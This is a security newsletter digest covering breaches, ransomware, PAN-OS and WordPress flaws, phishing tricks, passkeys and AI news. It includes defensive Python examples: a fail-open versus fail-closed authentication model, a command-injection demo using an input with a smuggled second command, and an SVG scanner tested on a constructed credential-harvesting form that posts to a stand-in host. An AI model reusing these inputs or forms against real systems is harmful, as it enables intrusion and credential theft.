Robert Grupe's AppSecNewsBits & AI 2024-11-23

EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Fintech Giant Finastra Investigating Data Breach
Finastra, which provides software and services to 45 of the world’s top 50 banks, notified customers of the security incident after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company.
The breach targeted Finastra’s internally hosted Secure File Transfer Platform, or SFTP, which was exploited using stolen credentials (essentially, a username and password). The attacker claims to have leveraged IBM Aspera, a high-speed file transfer tool, to exfiltrate data from Finastra’s systems.
In March 2020, Finastra suffered a ransomware attack that sidelined a number of the company’s core businesses for days.

 

SafePay ransomware gang claims Microlise attack that disrupted prison van tracking
The new SafePay ransomware gang has claimed responsibility for the attack on UK telematics biz Microlise, giving the company less than 24 hours to pay its extortion demands before leaking data.
Major customers reported issues soon after, including delivery giant DHL, which was unable to track its lorries, affecting deliveries to UK convenience stores operated by Nisa Group. British security company Serco, which manages numerous public sector contracts, including with the Ministry of Justice, was also hit. The company reported panic alarms and tracking systems used by prisoner transport vans were temporarily disabled, although service continued without disruption.

 

Mega US healthcare payments network restores system 9 months after ransomware attack
The only business functions yet to achieve full restoration status are Clinical Exchange (e-health record information exchange), MedRX (pharmacy claims management), and its Payer Print Communication Multi-Channel Distribution System (payment document printing).
However, providers will be feeling the huge financial impact of the incident for much longer. UnitedHealth-owned Optum launched its Temporary Funding Assistance Program on March 1 to support providers as they battled cashflow issues. The total amount of money loaned out to providers on an interest-free basis is thought to be more than $6 billion. That's on top of the $872 million Change Healthcare spent on remediating the attack just at the end of March, costs that have since risen to well above $2 billion (inclusive of tax).

 

1000s of Palo Alto Networks firewalls hijacked as miscreants exploit critical hole
Rumors started swirling last week about a critical security hole in Palo Alto Networks appliances that allowed remote unauthenticated attackers to execute arbitrary code on devices. Exploitation requires access to the PAN-OS management interface, either across the internet or via an internal network. The manufacturer did eventually admit that the firewall-busting vulnerability existed, and had been exploited as a zero-day - but it was still working on a patch.
Roughly 2,000 devices had been hijacked as of a day after Palo Alto Networks pushed a patch for the holes. The next day the number of seemingly compromised devices had dropped to about 800.
Once the attackers break in, they are using this access to deploy web shells, Sliver implants, and/or crypto miners.

 

Microsoft 365 Admin portal abused to send sextortion emails
Sextortion emails are scams claiming that your computer or mobile device was hacked to steal images or videos of you performing sexual acts. The scammers then demand from you a payment of $500 to $5,000 to prevent them from sharing the compromising photos with your family and friends. While you would think no one could fall for these scams, they were very profitable when they first appeared in 2018, generating over $50,000 a week.
Over the past week, people on LinkedIn, X, and the Microsoft Answers forum reported receiving sextortion emails through the Microsoft 365 Message Center, allowing the scams to bypass spam filters and land in the inbox.
The sextortion emails came from "o365mc@microsoft[.]com," which may feel like a phishing address but is actually Microsoft's legitimate email address used to send messages and notifications from the Microsoft 365 Message Center.
The threat actors are abusing the Personal Message feature by using it to send the sextortion message. However, this personal message field is limited to only 1,000 characters, with anything additional being truncated by the user interface. As the extortion message sent by the scammers is far more than 1,000 characters, it made me wonder how they were bypassing this restriction. The answer is simple. They just open up the browser's dev tools and change the maximum length field of the <textarea> tag to an arbitrary number of their choice. As Microsoft does not perform server-side checks for the character length, the entire extortion message is now sent along with the advisory.

 

Security plugin flaw in millions of WordPress sites gives admin access
Really Simple Security is a security plugin for the WordPress platform, offering SSL configuration, login protection, a two-factor authentication layer, and real-time vulnerability detection. Its free version alone is used in over four million websites.
The critical severity flaw in question is CVE-2024-10924, discovered by Wordfence's researcher István Márton on November 6, 2024.
It is caused by improper handling of user authentication in the plugin's two-factor REST API actions, enabling unauthorized access to any user account, including administrators.
Specifically, the problem lies in the 'check_login_and_get_user()' function that verifies user identities by checking the 'user_id' and 'login_nonce' parameters.
When 'login_nonce' is invalid, the request isn't rejected, as it should, but instead invokes 'authenticate_and_redirect(),' which authenticates the user based on the 'user_id' alone, effectively allowing authentication bypass.
The flaw is exploitable when two-factor authentication (2FA) is enabled, and even though it's disabled by default, many administrators will allow it for stronger account security.
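A small Python model of the fail-open pattern described above, next to a fail-closed version. This is an added example, not the plugin's PHP code: only the names check_login_and_get_user, authenticate_and_redirect, user_id and login_nonce come from the article, and the handlers, nonce store and redirect path are hypothetical.

```python
import hmac
import secrets


class AuthError(Exception):
    """Raised when a second-factor request cannot be tied to a pending login."""


# Constructed state: nonces issued after a correct password, keyed by user id.
PENDING_NONCES = {}


def issue_login_nonce(user_id: int) -> str:
    nonce = secrets.token_urlsafe(32)
    PENDING_NONCES[user_id] = nonce
    return nonce


def nonce_is_valid(user_id, login_nonce) -> bool:
    if not isinstance(user_id, int) or not isinstance(login_nonce, str):
        return False
    expected = PENDING_NONCES.get(user_id)
    if expected is None:
        return False
    # Constant-time comparison so the check does not leak how much matched.
    return hmac.compare_digest(expected.encode(), login_nonce.encode())


def authenticate_and_redirect(user_id: int) -> dict:
    # Stand-in for setting the session cookie and redirecting (hypothetical path).
    return {"authenticated_as": user_id, "redirect": "/dashboard"}


# --- Fail-open: the flaw as the article describes it ------------------------
def check_login_and_get_user_fail_open(user_id, login_nonce):
    if not nonce_is_valid(user_id, login_nonce):
        return None  # failure is only a return value ...
    return user_id


def handle_request_fail_open(params: dict) -> dict:
    check_login_and_get_user_fail_open(params["user_id"], params["login_nonce"])
    # ... that the caller never inspects, so user_id alone decides who logs in.
    return authenticate_and_redirect(params["user_id"])


# --- Fail-closed ------------------------------------------------------------
def check_login_and_get_user(user_id, login_nonce) -> int:
    if not nonce_is_valid(user_id, login_nonce):
        raise AuthError("invalid or missing login_nonce")
    del PENDING_NONCES[user_id]  # single use: a captured nonce cannot be replayed
    return user_id


def handle_request(params: dict) -> dict:
    # The identity comes from the check's return value, never straight from the request.
    user_id = check_login_and_get_user(params.get("user_id"), params.get("login_nonce"))
    return authenticate_and_redirect(user_id)
```

Raising on failure means a caller that forgets to handle the error aborts the request instead of continuing to the login step.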

 

Cyberattack at French hospital exposes health data of 750,000 patients
A threat actor using the nickname 'nears' (previously near2tlg) claimed to have attacked multiple healthcare facilities in France, alleging that they have access to the patient records of over 1,500,000 people.
The hacker claims they breached MediBoard by Software Medical Group, a company offering Electronic Patient Record (EPR) solutions across Europe.
"We can confirm that our software is not responsible, but rather, a privileged account within the client's infrastructure was compromised by an individual who exploited the standard functions of the solution,"

 

Spotify abused to promote pirated software and game cheats
A Spotify playlist with the title "Sony Vegas Pro 13 Crack..." appeared to drive traffic to one or more "free" software sites listed in the playlist title and description.
Cybercriminals exploit Spotify for malware distribution. Why? Spotify has a strong reputation and its pages are easily indexed by search engines, making it an effective platform to promote malicious links. By injecting targeted keywords and links in playlist names and podcast descriptions, threat actors may benefit from boosting SEO for their dubious online properties, since Spotify's web player results appear in search engines like Google.
This is made possible because, in addition to mobile and desktop apps, Spotify offers a web player version at open[.]spotify[.]com. Playlists and podcasts available on the web player are, as with any website, crawled by search engines like Google. This means, the illicit "free" software websites now have greater visibility and a higher chance of driving traffic to their servers—which are often riddled with ads, spam content, bogus "surveys," and crypto giveaways that one would have to navigate through to, perhaps, be able to finally download a cracked software product, which is once again bound to be risky.
Compared to playlists, we observed much greater instances of spurious podcasts, each with several "episodes," published with the apparent intention of promoting spam links, "torrents," and Telegram channels that seem to be scams. These "episodes" are about ten to twenty seconds long, and comprise synthesized speech audio that directs users to visit the "link in the description."
Similarly, some podcasts we discovered claimed to offer game cheat codes for hit titles like Apex Legends, Fortnite hacks, Roblox scripts, "GTA V mods," and trainers.

 

Palo Alto Networks zero-day firewall flaws caused by basic dev mistakes
Attackers are chaining two flaws in the wild to bypass authentication and escalate privileges via the PAN-OS management web interface to gain root privileges on Palo Alto Networks firewalls.
The first vulnerability (CVE-2024-0012) is rated critical with a score of 9.3 out of 10. By exploiting this issue, attackers can bypass authentication and gain administrative privileges on the management interface, enabling them to execute admin actions and change configurations. While this is bad enough, it does not directly lead to a full system compromise unless this functionality can be leveraged to execute malicious code on the underlying operating system. It turns out that attackers found such a way via a second vulnerability (CVE-2024-9474), which enables anyone with administrative privileges on the web interface to execute code on the Linux-based OS as root — the highest possible privilege.
watchTowr researchers found that a redirect script called uiEnvSetup.php expects the HTTP_X_PAN_AUTHCHECK value to be set to off, and if this is provided in the request, the server will just accept it. “We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!,” the researchers wrote in their report. “At this point, why is anyone surprised?”
The second bug is also trivial, being a command injection flaw that allows shell commands to be passed as a username to a function called AuditLog.write(), which then passes the injected command to pexecute().
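The command-injection pattern behind the second bug, shown as an added Python example (not PAN-OS code; the function names are hypothetical and the "logging helper" is a stand-in that echoes its argument): a username pasted into a shell string versus the same username passed as a single argv element behind an allow-list.

```python
import re
import shlex
import subprocess
import sys

# Stand-in for an external audit-logging helper: the Python interpreter echoing argv[1].
HELPER_SCRIPT = "import sys; print(sys.argv[1])"

# Assumed username policy for this example: short, no whitespace or shell metacharacters.
USERNAME_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def write_audit_weak(username: str) -> str:
    """Weak pattern: the username becomes part of a string that a shell then parses."""
    cmd = f'{shlex.quote(sys.executable)} -c "{HELPER_SCRIPT}" user={username}'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def write_audit_argv(username: str) -> str:
    """No shell involved: the username is one argv element, so metacharacters stay data."""
    argv = [sys.executable, "-c", HELPER_SCRIPT, f"user={username}"]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def write_audit_hardened(username: str) -> str:
    """Defence in depth: reject unexpected characters, then still avoid the shell."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allow-list")
    return write_audit_argv(username)


if __name__ == "__main__":
    sample = "alice; echo INJECTED"  # constructed input with a harmless marker command
    print("weak    :", write_audit_weak(sample).splitlines())
    print("argv    :", write_audit_argv(sample).splitlines())
    try:
        write_audit_hardened(sample)
    except ValueError as exc:
        print("hardened:", exc)
```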

 

'Alarming' security bugs lay low in Linux's needrestart utility for 10 years
Five vulnerabilities were identified this week for the first time, although they were actually introduced in April 2014.
The little tool is available separately and in various Linux distributions, and by default in Ubuntu Server, at least. All versions of the utility before 3.8 are considered vulnerable and attackers could execute code as root. Versions after 3.8 have the fix applied.
This exploit is achieved by manipulating an attacker-controlled environment variable that influences the Python/Ruby interpreter, passing unsanitized data to a library that expects safe input, thereby enabling the execution of arbitrary shell commands.
Qualys Threat Research Unit (TRU) said it was able to develop a working exploit but wouldn't release it, describing the vulnerabilities as "easily exploitable" and urging admins to apply the recommended fixes promptly.

 

What’s Weak This Week: Latest CISA Vulnerability Alerts
Apple Multiple Products Code Execution, Apple Multiple Products Cross-Site Scripting (XSS), Oracle Agile Product Lifecycle Management (PLM) Incorrect Authorization, VMware vCenter Server Heap-Based Buffer Overflow, VMware vCenter Server Privilege Escalation, Progress Kemp LoadMaster OS Command Injection, Palo Alto Networks PAN-OS Management Interface Authentication Bypass, Palo Alto Networks PAN-OS Management Interface OS Command Injection

 

HACKING
Chinese ship casts shadow over Baltic subsea cable snipfest
The Danish military has confirmed it is tracking a Chinese ship that is under investigation after two optical fiber internet cables under the Baltic Sea were damaged. The two cables run between Finland and Germany and between Lithuania and Sweden respectively. They are part of the circa 600 undersea cables – or shall we say, 600 that are publicly known about and tracked. Depending on weather conditions, estimated completion of the cable repair is by the end of November.

 

Fake AI video generators infect Windows, macOS with infostealers
Over the past month, threat actors have created fake websites that impersonate an AI video and image editor called EditPro. As discovered by cybersecurity researcher g0njxa, the sites are promoted through search results and advertisements on X that share deepfake political videos, such as President Biden and Trump enjoying ice cream together.
Clicking the images brings you to fake websites for the EditProAI application, with editproai[.]pro created to push Windows malware and editproai[.]org to push macOS malware.
The sites are professional-looking and even contain the ubiquitous cookie banner, making them look and feel legitimate.
However, clicking the "Get Now" links will download an executable pretending to be the EditProAI application. The Windows malware is signed by what appears to be a stolen code signing certificate from Softwareok[.]com, a freeware utility developer.
If you have downloaded this program in the past, you should consider all of your saved passwords, cryptocurrency wallets, and authentications compromised and immediately reset them with unique passwords at every site you visit.

 

Inside the Booming 'AI Pimping' Industry
Instagram is flooded with hundreds of AI-generated influencers who are stealing videos from real models and adult content creators, giving them AI-generated faces, and monetizing their bodies with links to dating sites, Patreon, OnlyFans competitors, and various AI apps.
The practice, first reported by 404 Media in April, has since exploded in popularity, showing Instagram is unable or unwilling to stop the flood of AI-generated content on its platform and protect the human creators on Instagram who say they are now competing with AI content in a way that is impacting their ability to make a living.

 

CISA says BianLian ransomware now focuses only on data theft
BianLian had started a switch to data theft extortion, gradually abandoning file encryption tactics, especially after Avast released a decryptor for the family in January 2023.
CISA recommends strictly limiting the use of RDP, disabling command-line and scripting permissions, and restricting the use of PowerShell on Windows systems.

 

Don’t Hold Down The Ctrl Key—New Warning As Cyber Attacks Confirmed
Threat actors are increasingly turning to Microsoft Visio .vsdx format files to evade detection during credential-stealing cyber attacks. The file contains another embedded URL, placed behind what the researchers described as a clickable call-to-action, most commonly a “view document” button. To access the embedded URL, victims are instructed to hold down the Ctrl key and click, a subtle yet highly effective action designed to evade email security scanners and automated detection tools. By asking for this human interaction, the attackers hope to bypass automated systems that don’t expect such behavior in an attack. The victim is then redirected to another fake page, this time one that looks, for all intents and purposes, like a Microsoft 365 portal login page and is designed, of course, to steal user credentials.

 

Phishing emails increasingly use SVG attachments to evade detection
Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code.
SVG attachments not only allow you to display graphics but can also be used to display HTML, using the <foreignObject> element, and execute JavaScript when the graphic is loaded. This allows threat actors to create SVG attachments that not only display images but also create phishing forms to steal credentials. A recent SVG attachment displays a fake Excel spreadsheet with a built-in login form that, when submitted, sends the data to the threat actors.
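A triage check for the SVG features described above, as an added example (not from the article; the function names, finding labels and both sample files are constructed). It flags script, <foreignObject>, event-handler attributes and embedded form controls, and refuses entity declarations before the XML parser sees them.

```python
import xml.etree.ElementTree as ET

# Names are compared by local name, lowercased, so namespaces and case do not matter.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
FORM_ELEMENTS = {"form", "input", "button", "select", "textarea"}
URL_ATTRS = {"href", "src", "action", "formaction"}


def local_name(name: str) -> str:
    """'{http://www.w3.org/2000/svg}foreignObject' -> 'foreignobject'."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list:
    """Return a sorted list of findings; an empty list means nothing active was found."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return ["non-utf8-encoding"]  # unusual for SVG: route to manual review
    if "<!entity" in text.lower():
        # Entity declarations can hide markup from the checks below or expand
        # into very large documents, so the file is never handed to the parser.
        return ["entity-declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["unparseable-xml"]

    findings = set()
    for el in root.iter():
        tag = local_name(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.add(f"active-element:{tag}")
        if tag in FORM_ELEMENTS:
            findings.add(f"form-control:{tag}")
        for attr, value in el.attrib.items():
            name = local_name(attr)
            target = "".join(value.split()).lower()  # drop whitespace used to split a scheme
            if name.startswith("on") and len(name) > 2:
                findings.add(f"event-handler:{name}")
            elif name in URL_ATTRS and target.startswith("javascript:"):
                findings.add("javascript-url")
            elif name == "action" and target.startswith(("http:", "https:", "//")):
                findings.add("external-form-action")
    return sorted(findings)


# Constructed sample: an ordinary graphic with a plain hyperlink.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <a href="https://example.org/"><circle cx="5" cy="5" r="4"/></a>
</svg>"""

# Constructed sample shaped like the lure in the article: an HTML login form
# inside <foreignObject>, plus a script element and an onload handler.
SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400" onload="init()">
  <foreignObject width="100%" height="100%">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <form action="https://collector.example.invalid/post" method="post">
        <input type="text" name="user"/>
        <input type="password" name="pass"/>
      </form>
    </div>
  </foreignObject>
  <script>/* constructed placeholder */</script>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, scan_svg(sample))
```

A mail gateway could quarantine any .svg attachment for which the list is non-empty, since legitimate logos and icons rarely need scripts or form controls.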

 

Spies hack Wi-Fi networks in far-off land to launch attack on target next door
For whatever reason—likely an assumption that 2FA on the Wi-Fi network was unnecessary because attacks required close proximity—the target deployed 2FA on the Internet-connecting web services platform but not on the Wi-Fi network. That one oversight ultimately torpedoed a robust security practice.
GruesomeLarch found devices in physically adjacent locations, compromised them, and used them to probe the target’s Wi-Fi network. It turned out credentials for the compromised web services accounts also worked for accounts on the Wi-Fi network, only no 2FA was required. Adding further flourish, the attackers hacked one of the neighboring Wi-Fi-enabled devices by exploiting what in early 2022 was a zero-day vulnerability in the Microsoft Windows Print Spooler.

 

Cybercriminals turn to pen testers to test ransomware efficiency
Any good developer knows that software needs to be tested before deploying in production environments. This is also true for ransomware gangs.
“In the Q3 2024 Cato CTRL SASE Threat Report, we highlight a trend of ransomware gangs recruiting pen testers. We believe this is to test whether their ransomware works for future attacks.”
Out of the hundreds of AI applications that Cato CTRL monitors, 10 AI applications were tracked and used by organizations (Bodygram, Craiyon, Otter[.]ai, Writesonic, Poe, HIX[.]AI, Fireflies[.]ai, PeekYou, Character[.]AI, and Luma AI), revealing various security risks. The top concern is data privacy. “Shadow AI is a major threat that has emerged in 2024,” said Maor. “Organizations should be mindful of the unauthorized use of AI applications and the dangers of letting employees inadvertently expose sensitive information.”
In Q3 2024, researchers found that 60% of attempts to exploit CVEs were blocked in TLS traffic.
Cato found that only 45% of participating organizations enable TLS inspection. Even then, only 3% of organizations inspected all relevant TLS-encrypted sessions. This leaves the door open for threat actors to utilize TLS traffic and remain undetected.
Cato found that organizations who enabled TLS inspection blocked 52% more malicious traffic than organizations without TLS inspection.

 

PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries
Cybersecurity researchers have discovered two malicious packages uploaded to the Python Package Index (PyPI) repository that impersonated popular artificial intelligence (AI) models like OpenAI ChatGPT and Anthropic Claude to deliver an information stealer called JarkaStealer.
[rG: This underscores the importance of development teams using a Binary Management System with integrated SCA (Software Composition Analysis) vulnerability scanning.]

 

APPSEC, DEVSECOPS, DEV
Data is the new uranium – incredibly powerful and amazingly dangerous
Welcome to the latest movement in IT's endless swings and roundabouts. Just as we've seen the center/edge debate in computing shift back and forth repeatedly over the last 50 years, we're now seeing emergence of another debate: data value versus data cost. The mantra at the start of this debate – "data is the new oil" – looks to be replaced by another, more accurate assessment: "data is the new yellowcake." For the unfamiliar, yellowcake is a radioactive, toxic, uranium oxide that can be further refined into a range of both very helpful and apocalyptically terrifying products.
Today, plenty of enterprises manage multiple petabytes of storage and we think nothing about moving a terabyte across the network or generating a few gigabytes of new media during a working day. Data is so common it has become nearly invisible. But they're mostly unable to identify all the data they hold, and are unsure if those who collect it understand the reputational and financial risks of a data breach – blame for which lands on a CISO's desk no matter who messed up. CISOs therefore increasingly feel that the cost of managing data sometimes exceeds its value.
[rG: Security By Default – Ensure that all database fields are strongly encrypted with least-privileged IAM usage. Yes, not as quick and easy to create and manage, but provides peaceful sleep knowing that reasonable due diligence protections are in place to mitigate sensitive information compromise and exposures.]

 

Five backup lessons learned from the UnitedHealth ransomware attack
Some ransomware groups – BlackCat, Akira, Lockbit, Phobos, and Crypto, for example – have been bypassing production systems altogether, and going straight for the backups.

  1. Network segmentation and air-gapped backup
    The company admitted that their backups weren’t sequestered with network segmentation or infrastructure gapping, so the attackers were able to lock those up, blocking any recovery path from the initial attack.

  2. Multi-factor authentication (MFA)
    The attack was orchestrated by hackers who leveraged stolen credentials to infiltrate the company’s systems lacking MFA. 

  3. Restricting administrative access
    Restricting administrative privileges is a vital part of a solid backup security strategy, as these privileges can be a primary target for attackers. 

  4. Immutable backup
    Ensure at least one of your backup copies is stored on immutable storage. This will ensure your backup data cannot be altered, deleted, or encrypted by malicious actors, including ransomware.

  5. Secure configuration baseline
    As recently mandated by the EU DORA (Digital Operational Resilience Act) and previously by USA NIST, establishing a secure configuration baseline for your backup and storage environment, and using tools to detect baseline deviations, is critical. It will ensure your backup estate is adhering to the principles laid out in this recommendation section – and much more.

 

Case Studies of Real-World SaaS Ransomware Attacks: 'They Didn't Handle It Well'
Rackspace ransomware attack of 2022: "The ransomware attack took place because they were on an unpatched version of Exchange, and attackers were able to get in and authenticate and then ransomware that way. There were no backups. So what happened was the customers were affected. All of their email was now gone." The attack occurred in the holiday season, early December shortly after Thanksgiving.
Common security measures and best practices include:

  • Strong Authentication Methods -- Multi-Factor Authentication (MFA), Single Sign-On (SSO)

  • Regular Data Backups -- Ensuring recovery capabilities if ransomware strikes

  • Encryption Standards -- Data encryption in transit and at rest

  • Security Awareness Training -- Educating employees on phishing and cyber hygiene

Building a ransomware defense strategy for SaaS involves:

  • Proactive Threat Detection -- Identifying suspicious activity early

  • Regular Vulnerability Assessments -- Scanning and patching SaaS applications

  • Incident Response Playbooks -- Steps for handling ransomware attacks in SaaS

  • Communication Plans -- Coordinating with teams and clients during an attack

Phishing: The attack mechanism is that ransomware usually enters the SaaS platform through phishing emails that are going to trick users into clicking malicious links or an attachment -- pretty classic phishing example. Once they get into one device, what the attackers might try to do is spread to connected SaaS applications, encrypting data. What's kind of weird about this is, unlike in an on-premises environment, the ransomware doesn't have to move laterally across network computers in the same way. For example, it might just focus on data residing in SaaS storage, for example, files on Google Drive or OneDrive. It can encrypt these files directly or delete them, sometimes affecting multiple accounts through shared folders or documents.

Advice for organizations to protect themselves against ransomware and phishing attacks in the SaaS space. Building a resilient SaaS security framework:

  • Integrating Security by Design -- Building security into the SaaS adoption process

  • Continuous Improvement through Audits and Assessments

  • Fostering a Security-First Culture -- Involving all departments in security awareness

  • Collaborative Approach with SaaS Vendors -- Coordinated effort with providers for optimal security

 

  • The assessed organization had insufficient technical controls to prevent and detect malicious activity.
    The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections.

  • The organization’s staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity.
    Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks.

  • The organization’s leadership minimized the business risk of known attack vectors for the organization.
    Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation.

CISA urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below:

  • Embed security into product architecture throughout the entire software development lifecycle (SDLC).

  • Eliminate default passwords.

  • Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.

 

Stop Using Your Passwords—1Password And Google Warn
Both have warned that passwords are less secure than an already available and easier to use alternative. Now 1Password has exclusively revealed to me how its users are flocking to passkeys as they seek to abandon passwords for a more hacker-resistant and passwordless future. Here’s what you need to know and why making the move is less painful than you might imagine.
Launched initially as an initiative by Apple, Google and Microsoft, passkeys are consumerizing security standards such as FIDO and WebAuthn. You can try a simple passkey demo at Passkeys[.]io and see just how painless they are to use and create. Google’s security team has gone on record to say that “passkeys are faster, more secure, and more convenient than passwords and multi-factor authentication, making them a desirable alternative to passwords and a promising development in the journey to a more secure future.”
The U.S. Cybersecurity And Infrastructure Security Agency has published a new warning as threat actors increasingly turn to multi-factor authentication bypass attacks. “Malicious actors don’t break in—they log in,” CISA warned, adding that many organizations are now struggling to protect their staff from passwords and credential phishing. While accepting that any kind of two-factor or multi-factor authentication is better than none at all, a stance that I heartily support, CISA warned that what it calls legacy MFA is “no match for modern threats.” By legacy MFA CISA is referring to the likes of applications that produce authentication codes or text-based, email-based or even push notification-based second factors.

 

Will passkeys ever replace passwords? Can they?
There remain a few weaknesses. There is no getting away from the fact that public keys always need some sort of bootstrap process. The process is bootstrapped by getting the user to authenticate using a traditional approach (such as username and password) which remains open to traditional attacks.
If a website adopts passkeys without disallowing subsequent login attempts by password, then the system remains roughly as vulnerable to phishing attacks as it was before. It bothers me to read blog posts from seemingly credible sources that don’t address the fact that passkeys are being added in addition to passwords but not (yet) replacing them. Maybe the time will come when passwords are the exception, but I see no way to get there on the current trajectory.
There is a well-defined API to allow a broad choice of authentication devices (such as FIDO keys or password managers) to manage the creation and use of private/public key pairs. But unless things get a lot more consistent and smooth for the end user, I fear this will end up just like PGP or client certificates in TLS: A technically valid solution that has minimal impact on the majority of users.

 

  1. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

  2. Out-of-bounds Write

  3. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

  4. Cross-Site Request Forgery (CSRF)

  5. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

  6. Out-of-bounds Read

  7. Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

  8. Use After Free

  9. Missing Authorization

  10. Unrestricted Upload of File with Dangerous Type

  11. Improper Control of Generation of Code ('Code Injection')

  12. Improper Input Validation

  13. Improper Neutralization of Special Elements used in a Command ('Command Injection')

  14. Improper Authentication

  15. Improper Privilege Management

  16. Deserialization of Untrusted Data

  17. Exposure of Sensitive Information to an Unauthorized Actor

  18. Incorrect Authorization

  19. Server-Side Request Forgery (SSRF)

  20. Improper Restriction of Operations within the Bounds of a Memory Buffer

  21. NULL Pointer Dereference

  22. Use of Hard-coded Credentials

  23. Integer Overflow or Wraparound

  24. Uncontrolled Resource Consumption

  25. Missing Authentication for Critical Function

 

OWASP Reveals Updated 2025 Top 10 Risks for LLMs, Announces New LLM Project Sponsorship Program and Inaugural Sponsors
LLM01:2025 Prompt Injection
LLM02:2025 Sensitive Information Disclosure
LLM03:2025 Supply Chain
LLM04:2025 Data and Model Poisoning
LLM05:2025 Improper Output Handling
LLM06:2025 Excessive Agency
LLM07:2025 System Prompt Leakage
LLM08:2025 Vector and Embedding Weaknesses
LLM09:2025 Misinformation

 

2024 DORA Accelerate State of DevOps report
Explore the ways of working that affect software development and delivery performance across the broad categories of AI, platform engineering, developer experience, and organizational transformation.

 

Elasticsearch Was Great, But Vector Databases Are the Future
For decades, keyword matching, also known as full-text search, exemplified by Elasticsearch, has been the default choice for information retrieval systems like enterprise search and recommendation engines.
As AI-powered search technologies advance, there is a shift toward semantic search, enabling systems to understand both the meaning and intent behind user queries. Embedding models and vector databases have become central to this shift.
Semantic search surpasses keyword matching by representing data as vector embeddings, providing a more nuanced understanding of search intent and transforming applications ranging from retrieval-augmented generation (RAG) to multimodal search.
In practice, effective information retrieval systems need both semantic understanding and exact keyword matching. For example, users expect search results to show concepts related to their search queries while also respecting the literal text used in the query, such as special terms and names and return the exact matching results.
A semantic search powered by dense vectors helps to understand the meaning (like knowing that “car” and “automobile” are the same) and traditional full-text search provides the precise results users expect (like finding exact matches for “Python 3.9”). As a result, many organizations are adopting a hybrid search approach, combining the strengths of both methods to balance flexible semantic relevance with predictable exact keyword matching.

 

  • Copilot Actions in Microsoft 365 Copilot to help you automate everyday repetitive tasks.

  • New agents in Microsoft 365 to unlock SharePoint knowledge, provide real-time language interpretation in Microsoft Teams meetings, and automate employee self-service.

  • The Copilot Control System to help IT professionals confidently manage Copilot and agents securely.

Not all of the agents Microsoft discussed today are available yet. One of the AI agents, a real-time Teams translator bot called Interpreter, is slated for next year. Microsoft will be adding available agents to Copilot Studio, currently an extra $200 charge on top of Microsoft 365, as they are ready, with a library for downloading agents currently in public preview. Developers are also able to create their own agents for 365, too, via an SDK that’s also now in public preview.
As for Copilot Actions, these are currently in private preview and will seemingly be available for everyone with a Microsoft 365 Copilot subscription (although Microsoft is mostly talking about them in an enterprise context). They are currently an extra $30 on top of the base Microsoft 365 subscription, assuming you don’t live in one of the areas that just got access to Copilot in 365 for free.

 

Microsoft’s controversial Recall scraper is finally entering public preview
Over five months after publicly scrapping the first version of the Windows Recall feature for its first wave of Copilot+ PCs, Microsoft announced today that a newly rearchitected version of Recall is finally ready for public consumption.
Recall is one of Microsoft’s many AI-driven Windows features exclusive to Copilot+ PCs, which come with a built-in neural processing unit (NPU) capable of running AI and machine learning workloads locally on your device rather than in the cloud. When enabled, Recall runs in the background constantly, taking screenshots of all your activity and saving both the screenshots and OCR’d text to a searchable database so that users can retrace their steps later.
The new version of Recall can be completely uninstalled for users who have no interest in it, or by IT administrators who don't want to risk it exposing sensitive data.
Testers will need to kick the tires on all of these changes to make sure that they meaningfully address all the risks and issues that the original version of Recall had, and this Windows Insider preview is their chance to do it.

 

AI hiring bias? Men with Anglo-Saxon names score lower in tech interviews
A lot of AI recruiting startups said they used language models and were bias-free.
A study looked at Google's Gemini-1.5-flash, Mistral AI's Open-Mistral-nemo-2407, and OpenAI's GPT4o-mini, to see how they classified and rated responses to 24 job interview questions.
The expected finding was that men and Western names would be favored, as prior bias studies have found. Instead, the results told a different story.
The applicant’s name and gender are permuted 200 times, corresponding with 200 discrete personas, subdivided into 100 males and 100 females, and grouped into four distinct cultural groups (West African, East Asian, Middle Eastern, Anglo-Saxon) reflected by their first name and surname. Crucially, various combinations of names and backgrounds were used for the same answers to test the models.
Thus this isn't the case that men with Anglo-Saxon names just aren't as good as their opposite at software engineering; it's that when the models were presented with that kind of male applicant, the computer systems down-rated otherwise favored answers.

 

The dirty little secret of open source contributions
“Nobody cares if you contribute.” That’s what a Postgres friend said to me during lunch at KubeCon when I suggested that hiring Postgres contributors could be a selling point for customers. His comment surprised me because for years I’ve believed the open source dogma that contributions somehow qualified developers and vendors to disproportionately profit from projects. This, despite the overwhelming evidence to the contrary.
